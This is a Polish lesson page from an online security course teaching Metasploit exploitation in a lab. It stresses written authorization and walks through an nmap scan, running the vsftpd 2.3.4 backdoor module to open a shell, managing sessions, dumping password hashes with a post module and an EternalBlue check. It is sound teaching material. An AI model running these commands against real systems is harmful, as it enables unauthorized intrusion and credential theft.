0Pricing
Cyber Security Academy · Lekcja

Wykorzystanie znanej podatności

Wykorzystają Państwo moduł exploita przeciwko podatnemu celowi w laboratorium i zinterpretują dane wyjściowe sesji.

Wykorzystanie znanej podatności to bezpłatna lekcja Cyber Security Academy na CoddyKit. To lekcja 2 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Cyber Security Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.

Etyka i autoryzacja przede wszystkim

Wykorzystywanie podatności jest legalne wyłącznie w odniesieniu do systemów, których są Państwo właścicielem, lub systemów, na testowanie których uzyskali Państwo wyraźną pisemną zgodę. Wszystkie przedstawione tutaj przykłady dotyczą autoryzowanych środowisk laboratoryjnych. Nieautoryzowane wykorzystywanie podatności jest przestępstwem.

Zalecana konfiguracja laboratorium

Używaj celowo podatnych maszyn wirtualnych: Metasploitable2/3, DVWA, maszyn VulnHub lub platform HackTheBox/TryHackMe do legalnych ćwiczeń. Nigdy nie testuj systemów produkcyjnych ani rzeczywistych systemów bez podpisanego dokumentu określającego zakres testu.

# Download Metasploitable2
# https://sourceforge.net/projects/metasploitable/

# Or use VulnHub
# https://www.vulnhub.com/

# Network: host-only adapter (isolated)

Rozpoznanie przed wykorzystaniem podatności

Zawsze wykonuj enumerację przed wykorzystaniem podatności. Przed wyborem exploita poznaj dokładną wersję usługi, system operacyjny i kontekst. Nieprawidłowa wersja oznacza nieudany exploit lub awarię systemu.

sudo nmap -sV -O 192.168.1.100

# Identify:
# - OS version
# - Service + exact version
# - Open ports
# Then search Metasploit for matching exploit

Wybór właściwego exploita

Wyszukuj według nazwy i wersji usługi. Preferuj moduły o randze Excellent lub Great. Przeczytaj informacje za pomocą info, aby potwierdzić zgodność platformy docelowej i zakresu wersji.

msf6 > search vsftpd 2.3.4
# exploit/unix/ftp/vsftpd_234_backdoor
# Rank: Excellent

msf6 > info exploit/unix/ftp/vsftpd_234_backdoor

Konfigurowanie i uruchamianie exploita

Ustaw RHOSTS (zdalny cel), LHOST (Twój adres IP dla połączeń zwrotnych), LPORT (port nasłuchujący), wybierz payload, a następnie uruchom moduł. Obserwuj komunikaty o utworzeniu sesji lub błędach.

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/interact
msf6 > run

# [*] Command shell session 1 opened

Interpretowanie wyników

Pomyślne wykorzystanie podatności otwiera sesję. Nieudane exploity wyświetlają komunikaty o błędach: odmowa połączenia (port nie jest otwarty), exploit nie powiódł się (nieprawidłowa wersja), nie utworzono sesji (payload nie nawiązał połączenia zwrotnego).

# Success:
[*] Started reverse TCP handler
[*] Command shell session 1 opened

# Failure:
[-] Exploit aborted: Bad return value from check
[-] Exploit failed: No session was created

Praca z sesją

Po wykorzystaniu podatności nawiąż interakcję z sesją za pomocą sessions -i . Podstawowe sesje powłoki zapewniają terminal, a sesje Meterpreter udostępniają rozbudowane API.

msf6 > sessions          # list all sessions
msf6 > sessions -i 1     # interact with session 1

# Once inside:
id
whoami
ifconfig
uname -a

Praca w tle i wiele sesji

Naciśnij Ctrl+Z, aby przenieść sesję do tła i wrócić do msfconsole. Umożliwia to zarządzanie wieloma sesjami lub uruchamianie modułów po uzyskaniu dostępu dla konkretnej sesji.

# Background active session
Ctrl+Z

# List sessions
msf6 > sessions

# Run post module against session 1
msf6 > use post/linux/gather/hashdump
msf6 > set SESSION 1
msf6 > run

Polecenie check

Wiele modułów exploit implementuje polecenie check, które sprawdza, czy cel jest podatny, bez faktycznego wykorzystywania podatności. Jeśli jest dostępne, zawsze najpierw uruchamiaj polecenie check.

msf6 exploit(ms17_010_eternalblue) > check

# [+] 192.168.1.100:445 - The target is vulnerable.
# Or:
# [-] 192.168.1.100:445 - The target is not vulnerable.

Kwestie niezawodności exploitów

Exploity mogą powodować awarie usług, uruchamiać alerty lub pozostawiać ślady w logach. W testach produkcyjnych uruchamiaj exploity w okresach małego ruchu, miej plan wycofania zmian i przed wykonaniem jakichkolwiek destrukcyjnych działań potwierdź istnienie kopii zapasowych.

Dokumentowanie wykorzystania podatności

Rejestruj: znacznik czasu, adres IP i port celu, użyty moduł exploit, numer CVE, użyty payload, uzyskaną sesję oraz dowody (zrzut ekranu lub wynik w terminalu). Jest to dowód podatności na potrzeby raportu.

Szybki sprawdzian

Co robi polecenie Metasploit "check"?

Podsumowanie: wykorzystywanie podatności

Etyczne wykorzystywanie podatności przebiega według jasnego schematu: uzyskaj pisemną autoryzację, dokładnie wykonaj enumerację, wybierz pasujący exploit, przeczytaj informacje o module, jeśli to możliwe, najpierw uruchom polecenie check, wykonaj exploit i wszystko udokumentuj. Nigdy nie wykorzystuj podatności bez autoryzacji — umiejętności techniczne i granice etyczne są nierozłączne.

Często zadawane pytania

Czy lekcja „Wykorzystanie znanej podatności” jest bezpłatna?

Tak — pełny tekst „Wykorzystanie znanej podatności” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Cyber Security Academy, przejdź na CoddyKit PRO. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.

Co nauczysz się w „Wykorzystanie znanej podatności”?

Wykorzystają Państwo moduł exploita przeciwko podatnemu celowi w laboratorium i zinterpretują dane wyjściowe sesji. Ćwiczysz Cyber Security Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.

Czy potrzebuję doświadczenia, aby zacząć Cyber Security Academy?

Nie wymagamy żadnego doświadczenia. Cyber Security Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 2 z 4.

Ile czasu zajmuje lekcja „Wykorzystanie znanej podatności”?

Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.

Czy mogę pisać i uruchamiać kod w tej lekcji Cyber Security Academy?

Tak. Każda lekcja Cyber Security Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.

Wszystkie lekcje w tym kursie

  1. Architektura Metasploit i msfconsole
  2. Wykorzystanie znanej podatności
  3. Payloady: staged, stageless i Meterpreter
  4. Po uzyskaniu dostępu: pivoting i utrzymanie dostępu
← Powrót do Cyber Security Academy